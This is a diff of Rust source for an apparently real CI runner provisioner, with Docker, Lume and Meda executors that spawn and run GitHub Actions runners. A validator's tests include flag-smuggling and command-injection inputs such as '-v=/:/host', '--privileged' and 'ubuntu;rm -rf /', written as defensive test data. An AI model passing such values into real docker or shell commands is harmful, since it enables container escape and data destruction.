+                let kv = argv[i + 1].splitn(2, '=').collect::<Vec<_>>();
+                pairs.push((kv[0].into(), kv[1].into()));
+                i += 2;
+            } else {
+                i += 1;
+            }
+        }
+        assert_eq!(
+            pairs,
+            vec![
+                ("RUNNER_TOKEN".into(), "abc".into()),
+                ("REPO_URL".into(), "https://github.com/o/r".into()),
+            ]
+        );
+    }
+
+    #[test]
+    fn run_argv_resources_are_applied() {
+        let mut s = spec(
+            "r-res",
+            "ubuntu:24.04",
+            GpuSelection::None,
+            ContainerCommand::Argv(vec!["true".into()]),
+        );
+        s.cpus = Some(4);
+        s.memory_gb = Some(16);
+        let argv = DockerClient::build_run_argv(&s);
+        assert!(argv.windows(2).any(|w| w == ["--cpus", "4"]));
+        assert!(argv.windows(2).any(|w| w == ["--memory", "16g"]));
+    }
+
+    #[test]
+    fn name_appears_after_name_flag() {
+        let s = spec(
+            "my-runner-xyz",
+            "ubuntu:24.04",
+            GpuSelection::None,
+            ContainerCommand::Argv(vec!["true".into()]),
+        );
+        let argv = DockerClient::build_run_argv(&s);
+        let pos = argv.iter().position(|a| a == "--name").unwrap();
+        assert_eq!(argv[pos + 1], "my-runner-xyz");
+    }
+
+    #[test]
+    fn run_argv_no_gpu_omits_gpus_flag() {
+        let s = spec(
+            "r-nogpu",
+            "ubuntu:24.04",
+            GpuSelection::None,
+            ContainerCommand::Argv(vec!["true".into()]),
+        );
+        let argv = DockerClient::build_run_argv(&s);
+        assert!(!argv.iter().any(|a| a == "--gpus"));
+    }
+}

--- a/src/docker/errors.rs
+++ b/src/docker/errors.rs
@@ -1,0 +1,34 @@
+use std::fmt;
+use std::io;
+
+#[derive(Debug)]
+pub enum DockerError {
+    Io(io::Error),
+    CommandFailed { code: Option<i32>, stderr: String },
+}
+
+impl fmt::Display for DockerError {
+    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
+        match self {
+            DockerError::Io(e) => write!(f, "docker io error: {e}"),
+            DockerError::CommandFailed { code, stderr } => {
+                write!(f, "docker command failed (code={code:?}): {stderr}")
+            }
+        }
+    }
+}
+
+impl std::error::Error for DockerError {
+    fn source(&self) -> Option<&(dyn std::error::Error + 'static)> {
+        match self {
+            DockerError::Io(e) => Some(e),
+            _ => None,
+        }
+    }
+}
+
+impl From<io::Error> for DockerError {
+    fn from(e: io::Error) -> Self {
+        DockerError::Io(e)
+    }
+}

--- a/src/docker/mod.rs
+++ b/src/docker/mod.rs
@@ -1,0 +1,3 @@
+pub mod client;
+pub mod errors;
+pub mod models;

--- a/src/docker/models.rs
+++ b/src/docker/models.rs
@@ -1,0 +1,34 @@
+use serde::{Deserialize, Serialize};
+
+#[derive(Debug, Clone, Serialize, Deserialize)]
+pub struct RunnerContainerSpec {
+    pub name: String,
+    pub image: String,
+    pub gpus: GpuSelection,
+    pub cpus: Option<u32>,
+    pub memory_gb: Option<u32>,
+    pub env: Vec<(String, String)>,
+    pub command: ContainerCommand,
+}
+
+#[derive(Debug, Clone, Serialize, Deserialize)]
+pub enum GpuSelection {
+    None,
+    All,
+    /// Pin N GPUs. Emits `--gpus N` to docker, which picks the first N free devices.
+    Count(u32),
+}
+
+#[derive(Debug, Clone, Serialize, Deserialize)]
+pub enum ContainerCommand {
+    /// Run a single shell script via `bash -lc <script>`
+    Script(String),
+    /// Run an entrypoint with the given argv
+    Argv(Vec<String>),
+}
+
+#[derive(Debug, Clone, Serialize, Deserialize)]
+pub struct ContainerInfo {
+    pub name: String,
+    pub state: String,
+}

--- a/src/executor/docker.rs
+++ b/src/executor/docker.rs
@@ -1,0 +1,366 @@
+//! Docker adapter: wraps `crate::docker::client::DockerClient` behind the `Executor` trait.
+
+use super::{Executor, GpuRequest, OwnedRunner, ProvisionError, RunnerSpec, RunnerState};
+use async_trait::async_trait;
+use std::sync::Arc;
+use std::time::Duration;
+
+/// `image` and `name` flow into `docker run` argv positionally. A value
+/// starting with `-` is parsed as a flag (`--privileged`, `-v=/:/host`, etc.)
+/// → container escape / host mount / RCE. Reject anything that doesn't look
+/// like a normal Docker reference (`registry/path/image:tag`,
+/// `image@sha256:digest`) or a runner name (`cirun-foo--bar`). `--` argv
+/// separators downstream are belt-and-braces; this is the suspenders.
+fn is_safe_docker_identifier(s: &str) -> bool {
+    if s.is_empty() || s.len() > 255 {
+        return false;
+    }
+    if s.starts_with('-') {
+        return false;
+    }
+    s.bytes()
+        .all(|b| b.is_ascii_alphanumeric() || matches!(b, b'.' | b'_' | b'-' | b'/' | b':' | b'@'))
+}
+
+/// True when `docker inspect` stderr means "container does not exist". The
+/// CLI prints different cases on different platforms — Docker Desktop on
+/// macOS emits `Error: No such object: <name>` while docker-ce on Linux emits
+/// `error: no such object: <name>`. Match case-insensitively against the
+/// stable substring so the inspect→Absent path works on both. Without this,
+/// the pre-spawn idempotency check returns `Transient` on Linux and the state
+/// machine never reaches `spawn`.
+pub(crate) fn is_docker_not_found(stderr: &str) -> bool {
+    let lower = stderr.to_ascii_lowercase();
+    lower.contains("no such object") || lower.contains("no such container")
+}
+
+/// True when the Actions runner's `Runner.Listener` process is up inside the
+/// container. Uses `pgrep -x` (exact basename) — NOT `-f` (full cmdline) —
+/// because the provision_script bash invocation embeds the literal string
+/// "Runner.Listener" in its argv (download URLs, log lines), which makes
+/// `-f` falsely match the script wrapper itself well before the actual
+/// runner binary is up. Any non-zero exit, including "container not
+/// running" or "pgrep missing", is treated as "not yet" so the settle
+/// loop keeps polling. Cheap (~50ms per call).
+fn runner_listener_running(bin: &str, container: &str) -> bool {
+    std::process::Command::new(bin)
+        .args(["exec", container, "pgrep", "-x", "Runner.Listener"])
+        .output()
+        .map(|o| o.status.success())
+        .unwrap_or(false)
+}
+
+/// Map a docker container state string (as returned by
+/// `docker inspect --format {{.State.Status}}` or `docker ps --format {{.State}}`)
+/// onto the executor-trait's RunnerState.
+///
+/// Note: `Absent` is NEVER returned here — the caller resolves "no such container"
+/// (e.g. via inspect exit code) before calling this mapper.
+pub(super) fn map_container_status(status: &str) -> RunnerState {
+    match status {
+        "running" => RunnerState::Healthy,
+        "created" | "restarting" => RunnerState::Starting,
+        "exited" | "dead" => RunnerState::Terminated {
+            exit_code: None,
+            last_logs: String::new(),
+        },
+        _ => RunnerState::Starting, // unknown statuses (paused, removing) treated as transitional
+    }
+}
+
+pub struct DockerExecutor {
+    client: Arc<crate::docker::client::DockerClient>,
+}
+
+impl DockerExecutor {
+    pub fn new() -> Self {
+        Self {
+            client: Arc::new(crate::docker::client::DockerClient::new()),
+        }
+    }
+
+    /// Cheap reachability check used by the registry probe. Returns the
+    /// docker server version string on success.
+    pub fn client_ping(&self) -> Result<String, crate::docker::errors::DockerError> {
+        self.client.ping()
+    }
+}
+
+#[async_trait]
+impl Executor for DockerExecutor {
+    fn settle_timeout(&self) -> Duration {
+        // Long enough to cover config.sh + sudo + svc.sh install on a fresh
+        // container. The old 45s default was too short — see HANDOFF.md #1.
+        Duration::from_secs(120)
+    }
+
+    /// Reject `image`/`name` values that could be smuggled past `docker run`'s
+    /// argument parser as flags (`--privileged`, `-v=/:/host`, etc.). Called
+    /// by the state machine before any I/O — failure is `Incompatible`, never
+    /// retried.
+    fn validate(&self, spec: &RunnerSpec) -> Result<(), ProvisionError> {
+        if !is_safe_docker_identifier(&spec.name) {
+            return Err(ProvisionError::Incompatible(format!(
+                "unsafe docker runner name '{}'",
+                spec.name
+            )));
+        }
+        if !is_safe_docker_identifier(&spec.image) {
+            return Err(ProvisionError::Incompatible(format!(
+                "unsafe docker image '{}'",
+                spec.image
+            )));
+        }
+        Ok(())
+    }
+
+    async fn inspect(&self, name: &str) -> Result<RunnerState, ProvisionError> {
+        // `docker inspect --format {{.State.Status}}` returns nonzero + "Error: No such ..."
+        // when the container is gone. Translate that to Absent.
+        let bin = "docker";
+        let out = std::process::Command::new(bin)
+            .args([
+                "inspect",
+                "--format",
+                "{{.State.Status}} {{.State.ExitCode}}",
+                "--",
+                name,
+            ])
+            .output()
+            .map_err(|e| ProvisionError::Transient(format!("docker inspect: {e}")))?;
+        if !out.status.success() {
+            let stderr = String::from_utf8_lossy(&out.stderr);
+            if is_docker_not_found(&stderr) {
+                return Ok(RunnerState::Absent);
+            }
+            return Err(ProvisionError::Transient(format!(
+                "docker inspect failed: {}",
+                stderr
+            )));
+        }
+        let raw = String::from_utf8_lossy(&out.stdout);
+        let raw = raw.trim();
+        let mut parts = raw.split_whitespace();
+        let status = parts.next().unwrap_or("");
+        let exit_code: Option<i32> = parts.next().and_then(|s| s.parse().ok());
+        let mut state = map_container_status(status);
+        // Decorate Terminated with the real exit code + last 30 log lines.
+        if let RunnerState::Terminated { .. } = state {
+            let logs = std::process::Command::new(bin)
+                .args(["logs", "--tail", "30", "--", name])
+                .output()
+                .map(|o| {
+                    let s = String::from_utf8_lossy(&o.stdout);
+                    let e = String::from_utf8_lossy(&o.stderr);
+                    format!("{e}\n{s}")
+                })
+                .unwrap_or_default();
+            state = RunnerState::Terminated {
+                exit_code,
+                last_logs: logs,
+            };
+        }
+        // Inner-runner readiness: a container being `running` only means the
+        // process tree exists, not that the GitHub Actions runner inside has
+        // finished `config.sh` and started polling. Until `Runner.Listener`
+        // is up, the runner is invisible to GitHub and the api will class it
+        // as orphan and issue a delete (~25-30s). Demote `Healthy` to
+        // `Starting` while the listener isn't there yet — the trait's settle
+        // loop then keeps `provision()` blocked, which keeps the runner in
+        // the agent's `in_flight` set, which makes `handle_orphaned_runners`
+        // refuse the racing delete. Empirically Runner.Listener appears
+        // 20-35s after `docker run` returns; settle_timeout is 120s.
+        if state == RunnerState::Healthy && !runner_listener_running(bin, name) {
+            state = RunnerState::Starting;
+        }
+        Ok(state)
+    }
+
+    async fn spawn(&self, spec: &RunnerSpec) -> Result<(), ProvisionError> {
+        use crate::docker::models::{ContainerCommand, GpuSelection, RunnerContainerSpec};
+        let gpus = match &spec.gpu {
+            GpuRequest::None => GpuSelection::None,
+            GpuRequest::All => GpuSelection::All,
+            GpuRequest::Count(n) => GpuSelection::Count(*n),
+        };
+        let container_spec = RunnerContainerSpec {
+            name: spec.name.clone(),
+            image: spec.image.clone(),
+            gpus,
+            cpus: Some(spec.cpu),
+            memory_gb: Some(spec.memory_gb),
+            env: vec![("CIRUN_RUNNER_NAME".into(), spec.name.clone())],
+            command: ContainerCommand::Script(spec.provision_script.clone()),
+        };
+        self.client
+            .run_runner(&container_spec)
+            .map(|_| ())
+            .map_err(|e| ProvisionError::Transient(format!("docker run failed: {e}")))
+    }
+
+    async fn kill(&self, name: &str) -> Result<(), ProvisionError> {
+        self.client
+            .stop_and_remove(name)
+            .map_err(|e| ProvisionError::Transient(format!("docker rm: {e}")))
+    }
+
+    async fn list_owned(&self) -> Result<Vec<OwnedRunner>, ProvisionError> {
+        let infos = self
+            .client
+            .list_runner_containers("cirun.runner=true")
+            .map_err(|e| ProvisionError::Transient(format!("docker ps: {e}")))?;
+        Ok(infos
+            .into_iter()
+            .map(|i| OwnedRunner {
+                name: i.name,
+                state: map_container_status(&i.state),
+            })
+            .collect())
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn running_maps_to_healthy() {
+        assert_eq!(map_container_status("running"), RunnerState::Healthy);
+    }
+
+    #[test]
+    fn created_maps_to_starting() {
+        assert_eq!(map_container_status("created"), RunnerState::Starting);
+    }
+
+    #[test]
+    fn restarting_maps_to_starting() {
+        assert_eq!(map_container_status("restarting"), RunnerState::Starting);
+    }
+
+    #[test]
+    fn exited_maps_to_terminated() {
+        assert!(matches!(
+            map_container_status("exited"),
+            RunnerState::Terminated { .. }
+        ));
+    }
+
+    #[test]
+    fn dead_maps_to_terminated() {
+        assert!(matches!(
+            map_container_status("dead"),
+            RunnerState::Terminated { .. }
+        ));
+    }
+
+    #[test]
+    fn safe_identifier_accepts_normal_images_and_names() {
+        for s in [
+            "ubuntu:24.04",
+            "ghcr.io/aktech/runner:latest",
+            "cirun-gpu-runner:latest",
+            "image@sha256:abcdef0123",
+            "cirun-aktech--repo-1a5bc0163a",
+        ] {
+            assert!(is_safe_docker_identifier(s), "rejected: {s}");
+        }
+    }
+
+    #[test]
+    fn safe_identifier_rejects_flag_shapes() {
+        for s in [
+            "--privileged",
+            "-v=/:/host",
+            "--security-opt=apparmor=unconfined",
+            "-",
+        ] {
+            assert!(!is_safe_docker_identifier(s), "accepted leading-dash: {s}");
+        }
+    }
+
+    #[test]
+    fn safe_identifier_rejects_shell_metachars_and_whitespace() {
+        for s in [
+            "ubuntu;rm -rf /",
+            "ubuntu image",
+            "ubuntu`whoami`",
+            "ubuntu|sh",
+        ] {
+            assert!(!is_safe_docker_identifier(s), "accepted: {s:?}");
+        }
+    }
+
+    fn rspec(name: &str, image: &str) -> RunnerSpec {
+        RunnerSpec {
+            name: name.into(),
+            provision_script: String::new(),
+            image: image.into(),
+            cpu: 2,
+            memory_gb: 4,
+            disk_gb: 20,
+            gpu: GpuRequest::None,
+            login: crate::executor::RunnerLogin {
+                username: "u".into(),
+                password: "p".into(),
+            },
+        }
+    }
+
+    #[test]
+    fn validate_rejects_flag_shaped_image() {
+        let exec = DockerExecutor::new();
+        let err = exec
+            .validate(&rspec("ok", "--privileged"))
+            .expect_err("must reject flag-shaped image");
+        assert!(matches!(err, ProvisionError::Incompatible(_)));
+    }
+
+    #[test]
+    fn validate_rejects_flag_shaped_name() {
+        let exec = DockerExecutor::new();
+        let err = exec
+            .validate(&rspec("--rm", "ubuntu:24.04"))
+            .expect_err("must reject flag-shaped name");
+        assert!(matches!(err, ProvisionError::Incompatible(_)));
+    }
+
+    #[test]
+    fn validate_accepts_normal_spec() {
+        let exec = DockerExecutor::new();
+        assert!(exec.validate(&rspec("cirun-r1", "ubuntu:24.04")).is_ok());
+    }
+
+    #[test]
+    fn not_found_classifier_matches_macos_docker_desktop_form() {
+        assert!(is_docker_not_found(
+            "Error: No such object: cirun-aktech--demo-25b350fc9b\n"
+        ));
+    }
+
+    #[test]
+    fn not_found_classifier_matches_linux_docker_ce_form() {
+        // docker-ce 29.x on Ubuntu emits the lowercase variant — observed on
+        // 192.168.50.106 on 2026-05-15. Pre-fix this slipped past the
+        // case-sensitive check and the state machine never spawned.
+        assert!(is_docker_not_found(
+            "\nerror: no such object: cirun-aktech--demo-25b350fc9b\n"
+        ));
+    }
+
+    #[test]
+    fn not_found_classifier_matches_no_such_container_phrasing() {
+        assert!(is_docker_not_found("Error: No such container: foo"));
+        assert!(is_docker_not_found("error: no such container: foo"));
+    }
+
+    #[test]
+    fn not_found_classifier_rejects_unrelated_errors() {
+        assert!(!is_docker_not_found(
+            "Cannot connect to the Docker daemon at unix:///var/run/docker.sock"
+        ));
+        assert!(!is_docker_not_found(
+            "permission denied while trying to connect"
+        ));
+    }
+}

--- a/src/executor/lume.rs
+++ b/src/executor/lume.rs
@@ -1,0 +1,194 @@
+//! Lume adapter: wraps `crate::lume::client::LumeClient` behind the `Executor` trait.
+
+use super::{Executor, GpuRequest, OwnedRunner, ProvisionError, RunnerSpec, RunnerState};
+use async_trait::async_trait;
+use std::sync::Arc;
+use std::time::Duration;
+
+pub(super) fn validate_gpu(spec: &RunnerSpec) -> Result<(), ProvisionError> {
+    if !matches!(spec.gpu, GpuRequest::None) {
+        return Err(ProvisionError::Incompatible(
+            "lume executor does not support GPU passthrough".into(),
+        ));
+    }
+    Ok(())
+}
+
+pub(super) fn map_vm_state(status: &str) -> RunnerState {
+    match status {
+        "running" => RunnerState::Healthy,
+        "starting" | "creating" => RunnerState::Starting,
+        "stopped" | "paused" | "saved" | "error" => RunnerState::Terminated {
+            exit_code: None,
+            last_logs: String::new(),
+        },
+        _ => RunnerState::Starting,
+    }
+}
+
+pub struct LumeExecutor {
+    client: Arc<crate::lume::client::LumeClient>,
+}
+
+impl LumeExecutor {
+    pub fn new() -> Result<Self, ProvisionError> {
+        let client = crate::lume::client::LumeClient::new()
+            .map_err(|e| ProvisionError::Transient(format!("lume init: {e}")))?;
+        Ok(Self {
+            client: Arc::new(client),
+        })
+    }
+}
+
+#[async_trait]
+impl Executor for LumeExecutor {
+    fn settle_timeout(&self) -> Duration {
+        Duration::from_secs(300)
+    }
+
+    /// Apple Virtualization framework does not expose GPUs to guests.
+    fn validate(&self, spec: &RunnerSpec) -> Result<(), ProvisionError> {
+        validate_gpu(spec)
+    }
+
+    async fn inspect(&self, name: &str) -> Result<RunnerState, ProvisionError> {
+        match self.client.get_vm(name).await {
+            Ok(info) => Ok(map_vm_state(&info.state)),
+            Err(_) => Ok(RunnerState::Absent),
+        }
+    }
+
+    /// Lume "spawn" = clone from the template VM named in `spec.image`, then
+    /// kick off `run_vm` AND wait for the VM to actually leave the `stopped`
+    /// state. Lume's `POST /vms/{name}/run` returns `202 Accepted` —
+    /// the start is async, and `inspect` immediately after returns `stopped`
+    /// for a brief window. `map_vm_state("stopped")` is `Terminated`, so
+    /// without the post-run wait the trait's settle loop sees Terminated on
+    /// its very first poll and kills the VM before it ever reached `starting`.
+    async fn spawn(&self, spec: &RunnerSpec) -> Result<(), ProvisionError> {
+        use crate::lume::models::RunConfig;
+        // Verify template exists first so a typo doesn't waste a clone attempt.
+        self.client.get_vm(&spec.image).await.map_err(|e| {
+            ProvisionError::Permanent(format!("template '{}' not found: {e:?}", spec.image))
+        })?;
+        self.client
+            .clone_vm(&spec.image, &spec.name)
+            .await
+            .map_err(|e| ProvisionError::Transient(format!("lume clone_vm: {e:?}")))?;
+        let run_config = RunConfig {
+            no_display: Some(true),
+            shared_directories: None,
+            recovery_mode: None,
+        };
+        self.client
+            .run_vm(&spec.name, Some(run_config))
+            .await
+            .map_err(|e| ProvisionError::Transient(format!("lume run_vm: {e:?}")))?;
+        // Block until the daemon shows the VM has left `stopped`. The xcode
+        // image is larger and slower to start than vanilla — 30s wasn't
+        // enough on m1 (observed 2026-05-15). 120s is generous; actual boot
+        // is then still covered by the trait's settle loop afterwards.
+        let deadline = tokio::time::Instant::now() + Duration::from_secs(120);
+        loop {
+            tokio::time::sleep(Duration::from_millis(500)).await;
+            match self.client.get_vm(&spec.name).await {
+                Ok(info) if info.state != "stopped" => return Ok(()),
+                Ok(_) => {} // still stopped — keep waiting
+                Err(e) => log::debug!("lume get_vm during spawn-wait: {e:?}"),
+            }
+            if tokio::time::Instant::now() >= deadline {
+                return Err(ProvisionError::Transient(format!(
+                    "lume VM '{}' did not leave 'stopped' state within 120s of run_vm",
+                    spec.name
+                )));
+            }
+        }
+    }
+
+    async fn kill(&self, name: &str) -> Result<(), ProvisionError> {
+        self.client
+            .delete_vm(name)
+            .await
+            .map_err(|e| ProvisionError::Transient(format!("lume delete_vm: {e:?}")))
+    }
+
+    async fn list_owned(&self) -> Result<Vec<OwnedRunner>, ProvisionError> {
+        let vms = self
+            .client
+            .list_vms()
+            .await
+            .map_err(|e| ProvisionError::Transient(format!("lume list_vms: {e:?}")))?;
+        Ok(vms
+            .into_iter()
+            .filter(|v| v.name.starts_with("cirun-"))
+            .map(|v| OwnedRunner {
+                name: v.name,
+                state: map_vm_state(&v.state),
+            })
+            .collect())
+    }
+
+    /// After clone, the VM is stopped. `run_script_on_vm` starts it and runs
+    /// the provision script over SSH.
+    async fn run_post_spawn(&self, spec: &RunnerSpec) -> Result<(), ProvisionError> {
+        crate::run_script_on_vm(
+            &self.client,
+            &spec.name,
+            &spec.provision_script,
+            &spec.login.username,
+            &spec.login.password,
+            20,
+            true,
+        )
+        .await
+        .map(|_| ())
+        .map_err(|e| ProvisionError::Transient(format!("provision script: {e}")))
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn running_maps_to_healthy() {
+        assert_eq!(map_vm_state("running"), RunnerState::Healthy);
+    }
+
+    #[test]
+    fn stopped_maps_to_terminated() {
+        assert!(matches!(
+            map_vm_state("stopped"),
+            RunnerState::Terminated { .. }
+        ));
+    }
+
+    fn dummy_spec(gpu: GpuRequest) -> RunnerSpec {
+        RunnerSpec {
+            name: "r1".into(),
+            provision_script: String::new(),
+            image: "tmpl".into(),
+            cpu: 2,
+            memory_gb: 4,
+            disk_gb: 20,
+            gpu,
+            login: crate::executor::RunnerLogin {
+                username: "u".into(),
+                password: "p".into(),
+            },
+        }
+    }
+
+    #[test]
+    fn validate_rejects_gpu() {
+        assert!(validate_gpu(&dummy_spec(GpuRequest::None)).is_ok());
+        assert!(matches!(
+            validate_gpu(&dummy_spec(GpuRequest::All)),
+            Err(ProvisionError::Incompatible(_))
+        ));
+        assert!(matches!(
+            validate_gpu(&dummy_spec(GpuRequest::Count(1))),
+            Err(ProvisionError::Incompatible(_))
+        ));
+    }
+}

--- a/src/executor/meda.rs
+++ b/src/executor/meda.rs
@@ -1,0 +1,224 @@
+//! Meda adapter: wraps `crate::meda::client::MedaClient` behind the `Executor` trait.
+
+use super::{Executor, OwnedRunner, ProvisionError, RunnerLogin, RunnerSpec, RunnerState};
+use async_trait::async_trait;
+use std::sync::Arc;
+use std::time::Duration;
+
+/// Map a meda VM state string onto `RunnerState`.
+///
+/// Note: `Absent` is never returned here — caller handles "VM not found"
+/// (`get_vm` error) before invoking this mapper.
+pub(super) fn map_vm_state(status: &str) -> RunnerState {
+    match status {
+        "running" => RunnerState::Healthy,
+        "starting" | "creating" | "provisioning" => RunnerState::Starting,
+        "stopped" | "paused" | "saved" | "error" | "failed" => RunnerState::Terminated {
+            exit_code: None,
+            last_logs: String::new(),
+        },
+        _ => RunnerState::Starting,
+    }
+}
+
+pub struct MedaExecutor {
+    client: Arc<crate::meda::client::MedaClient>,
+}
+
+impl MedaExecutor {
+    pub fn new() -> Result<Self, ProvisionError> {
+        let client = crate::meda::client::MedaClient::new()
+            .map_err(|e| ProvisionError::Transient(format!("meda init: {e}")))?;
+        Ok(Self {
+            client: Arc::new(client),
+        })
+    }
+}
+
+#[async_trait]
+impl Executor for MedaExecutor {
+    fn settle_timeout(&self) -> Duration {
+        Duration::from_secs(300)
+    }
+
+    async fn inspect(&self, name: &str) -> Result<RunnerState, ProvisionError> {
+        match self.client.get_vm(name).await {
+            Ok(info) => Ok(map_vm_state(&info.state)),
+            Err(_) => Ok(RunnerState::Absent),
+        }
+    }
+
+    async fn spawn(&self, spec: &RunnerSpec) -> Result<(), ProvisionError> {
+        use crate::meda::models::VmRunRequest;
+        let req = VmRunRequest {
+            image: spec.image.clone(),
+            name: Some(spec.name.clone()),
+            memory: Some(format!("{}G", spec.memory_gb)),
+            cpus: Some(spec.cpu),
+            disk_size: Some(format!("{}G", spec.disk_gb)),
+        };
+        self.client
+            .run_vm(req)
+            .await
+            .map_err(|e| ProvisionError::Transient(format!("meda run_vm: {e:?}")))
+    }
+
+    async fn kill(&self, name: &str) -> Result<(), ProvisionError> {
+        self.client
+            .delete_vm(name)
+            .await
+            .map_err(|e| ProvisionError::Transient(format!("meda delete_vm: {e:?}")))
+    }
+
+    async fn list_owned(&self) -> Result<Vec<OwnedRunner>, ProvisionError> {
+        let vms = self
+            .client
+            .list_vms()
+            .await
+            .map_err(|e| ProvisionError::Transient(format!("meda list_vms: {e:?}")))?;
+        Ok(vms
+            .into_iter()
+            .filter(|v| v.name.starts_with("cirun-"))
+            .map(|v| OwnedRunner {
+                name: v.name,
+                state: map_vm_state(&v.state),
+            })
+            .collect())
+    }
+
+    /// After meda reports the VM "running", we still need to wait for DHCP +
+    /// SSH before the provision script can be pushed. That belongs here, not
+    /// in the trait's settle loop.
+    async fn run_post_spawn(&self, spec: &RunnerSpec) -> Result<(), ProvisionError> {
+        log::info!("Waiting for VM '{}' to get an IP address...", spec.name);
+        let ip = self
+            .client
+            .wait_for_vm_ip(&spec.name, 300)
+            .await
+            .map_err(|e| ProvisionError::Transient(format!("wait_for_vm_ip: {e:?}")))?;
+        log::info!("VM '{}' has IP {}; pushing provision script", spec.name, ip);
+
+        push_provision_script_via_ssh(&spec.name, &ip, &spec.provision_script, &spec.login, true)
+            .await
+            .map(|_| ())
+            .map_err(|e| ProvisionError::Transient(format!("provision script: {e}")))
+    }
+}
+
+/// SSH the meda VM with its ed25519 key, scp the provision script, run it
+/// under `sudo bash`. Detached mode launches in background (short timeout);
+/// blocking mode waits up to 10 minutes for completion. Lives next to the
+/// `MedaExecutor` that owns the SSH-push lifecycle.
+async fn push_provision_script_via_ssh(
+    vm_name: &str,
+    ip_address: &str,
+    script_content: &str,
+    login: &RunnerLogin,
+    run_detached: bool,
+) -> Result<String, Box<dyn std::error::Error>> {
+    use crate::ssh::{copy_file, exec, test_connection, SshAuth, SshTarget};
+    use std::io::Write;
+    use std::time::Instant;
+    use tempfile::NamedTempFile;
+
+    log::info!("VM '{}' is ready with IP: {}", vm_name, ip_address);
+
+    let mut temp_file = NamedTempFile::new()?;
+    temp_file.write_all(script_content.as_bytes())?;
+
+    let home_dir = std::env::var("HOME").unwrap_or_else(|_| "/root".to_string());
+    let target = SshTarget::new(
+        ip_address.to_string(),
+        login.username.clone(),
+        SshAuth::Key(std::path::PathBuf::from(format!(
+            "{}/.meda/ssh/id_ed25519",
+            home_dir
+        ))),
+    )?;
+
+    // Wait for SSH to be ready (VM may still be booting).
+    let max_retries = 6usize;
+    let mut last_err: Option<String> = None;
+    for attempt in 1..=max_retries {
+        match test_connection(&target).await {
+            Ok(()) => {
+                log::info!("✔ SSH ready (attempt {}/{})", attempt, max_retries);
+                last_err = None;
+                break;
+            }
+            Err(e) => {
+                last_err = Some(e.to_string());
+                if attempt < max_retries {
+                    log::info!("SSH not ready (attempt {}/{}): {}", attempt, max_retries, e);
+                    tokio::time::sleep(tokio::time::Duration::from_secs(5)).await;
+                }
+            }
+        }
+    }
+    if let Some(e) = last_err {
+        return Err(format!("SSH not reachable after {max_retries} retries: {e}").into());
+    }
+
+    let remote_path = format!("/tmp/script_{}.sh", Instant::now().elapsed().as_secs());
+    copy_file(&target, temp_file.path(), &remote_path)
+        .await
+        .map_err(|e| -> Box<dyn std::error::Error> { e.into() })?;
+
+    // meda scripts run with sudo. Detached: short launch timeout. Blocking: 10min.
+    let (timeout_secs, cmd) = if run_detached {
+        (
+            60u64,
+            format!(
+                "chmod +x {p} && sudo nohup bash {p} > /tmp/script_stdout.log 2> /tmp/script_stderr.log & echo $!",
+                p = remote_path
+            ),
+        )
+    } else {
+        (
+            600u64,
+            format!("chmod +x {p} && sudo bash {p}", p = remote_path),
+        )
+    };
+    let stdout = exec(
+        &target,
+        &cmd,
+        tokio::time::Duration::from_secs(timeout_secs),
+    )
+    .await
+    .map_err(|e| -> Box<dyn std::error::Error> { e.into() })?;
+    log::info!("Script execution completed successfully.");
+    Ok(stdout)
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn running_maps_to_healthy() {
+        assert_eq!(map_vm_state("running"), RunnerState::Healthy);
+    }
+
+    #[test]
+    fn starting_maps_to_starting() {
+        assert_eq!(map_vm_state("starting"), RunnerState::Starting);
+        assert_eq!(map_vm_state("creating"), RunnerState::Starting);
+    }
+
+    #[test]
+    fn stopped_maps_to_terminated() {
+        assert!(matches!(
+            map_vm_state("stopped"),
+            RunnerState::Terminated { .. }
+        ));
+        assert!(matches!(
+            map_vm_state("failed"),
+            RunnerState::Terminated { .. }
+        ));
+    }
+
+    #[test]
+    fn unknown_maps_to_starting() {
+        assert_eq!(map_vm_state("weirdo"), RunnerState::Starting);
+    }
+}

--- a/src/executor/mod.rs
+++ b/src/executor/mod.rs
@@ -1,0 +1,270 @@
+//! Executor abstraction — unifies docker / meda / lume runtime backends behind
+//! a single trait. State machine, settle-poll, idempotency, and cleanup live
+//! in default-impl methods; each executor provides 4 primitives.
+
+pub mod docker;
+#[cfg(target_os = "macos")]
+pub mod lume;
+#[cfg(target_os = "linux")]
+pub mod meda;
+pub mod registry;
+
+use async_trait::async_trait;
+use std::time::Duration;
+
+#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, serde::Deserialize, serde::Serialize)]
+#[serde(rename_all = "lowercase")]
+pub enum ExecutorKind {
+    Docker,
+    Meda,
+    Lume,
+}
+
+fn parse_executor_name(s: &str) -> Result<ExecutorKind, String> {
+    match s.trim().to_ascii_lowercase().as_str() {
+        "docker" => Ok(ExecutorKind::Docker),
+        "meda" => Ok(ExecutorKind::Meda),
+        "lume" => Ok(ExecutorKind::Lume),
+        other => Err(format!("unknown executor '{other}'")),
+    }
+}
+
+/// Resolve executor kind, honouring all signals in priority order:
+///   1. `top_executor` — cirun-api-set top-level field (preferred contract).
+///   2. `extra_config.executor` — same string under extra_config (legacy).
+///   3. `extra_config.container == true` — legacy bool, maps to Docker.
+///   4. OS default — linux → Meda, macos → Lume.
+pub fn resolve_executor_kind(
+    top_executor: Option<&str>,
+    extra_config: Option<&serde_json::Value>,
+    os: &str,
+) -> Result<ExecutorKind, String> {
+    if let Some(s) = top_executor {
+        if !s.is_empty() {
+            return parse_executor_name(s);
+        }
+    }
+    if let Some(cfg) = extra_config {
+        if let Some(name) = cfg.get("executor").and_then(|v| v.as_str()) {
+            return parse_executor_name(name);
+        }
+        if cfg.get("container").and_then(|v| v.as_bool()) == Some(true) {
+            return Ok(ExecutorKind::Docker);
+        }
+    }
+    match os {
+        "linux" => Ok(ExecutorKind::Meda),
+        "macos" => Ok(ExecutorKind::Lume),
+        other => Err(format!("no default executor for os '{other}'")),
+    }
+}
+
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub enum GpuRequest {
+    None,
+    All,
+    Count(u32),
+}
+
+/// Parse a `gpu` field from `extra_config` into a `GpuRequest`.
+///
+/// Accepted forms (matches the `.cirun.yml` schema):
+///   - missing / null → `None`
+///   - `"none"` (any case) → `None`
+///   - `"all"` (any case) → `All`
+///   - integer `1`, `2`, ... → `Count(n)`
